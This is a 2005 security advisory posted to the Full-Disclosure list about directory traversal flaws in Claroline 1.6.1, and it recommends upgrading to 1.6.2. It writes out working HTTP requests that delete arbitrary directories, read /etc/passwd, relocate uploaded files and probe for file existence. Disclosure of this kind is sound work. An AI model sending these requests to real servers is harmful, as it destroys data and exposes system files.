Multiple directory traversal vulnerabilities in Claroline

["fdsf hfdhfjk" <robbedekeyzer () hotmail com>]

Product description: Claroline (http://www.claroline.net) is a free 
application based on PHP /MySQL. It's a collaborative learning environment 
allowing teachers or education institutions to create and administer courses 
through the web.

Vulnerability: Claroline 1.6.1 is vulnerable to multiple directory traversal 
attacks. You have to have teacher privileges to perform any of these.


1) Arbitrary directory deletion

GET /claroline/scorm/scormdocument.php?delete=/../../001

Any directory owned by user www can be deleted, it does not have to be 
empty.


2) Arbitrary file reading

POST /claroline/document/document.php
content: 
move_file=%2F../../../../../../../../etc/passwd&move_to=%2F&move_file_submit=OK

Then: GET /courses/2510/document/passwd  (where 2510 is the course id)


3) Arbitrary file creation

With /claroline/document/document.php, one can upload any file with any 
content (no php files)
Using the same vulnerability as (2), one could move this file to anywhere on 
the system.

POST /claroline/document/document.php
content: move_file=%2Ffile.cgi&move_to=%2F../..&move_file_submit=OK


4) Checking if certain files exist on the system  (much less critical)

GET 
/claroline/scorm/showinframes.php?openfirst=yes&indexRoute=&file=/tmp/test.txt
GET /claroline/scorm/contents.php?file=/tmp%2Ftest.txt


Solution: upgrade to version 1.6.2, the latest release, available at 
http://www.claroline.net/download.htm


Robbe De Keyzer (robbedekeyzer () hotmail com)
August 12, 2005

_________________________________________________________________
Gratis bloggen op MSN Spaces  http://spaces.msn.com/?mkt=nl-be

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/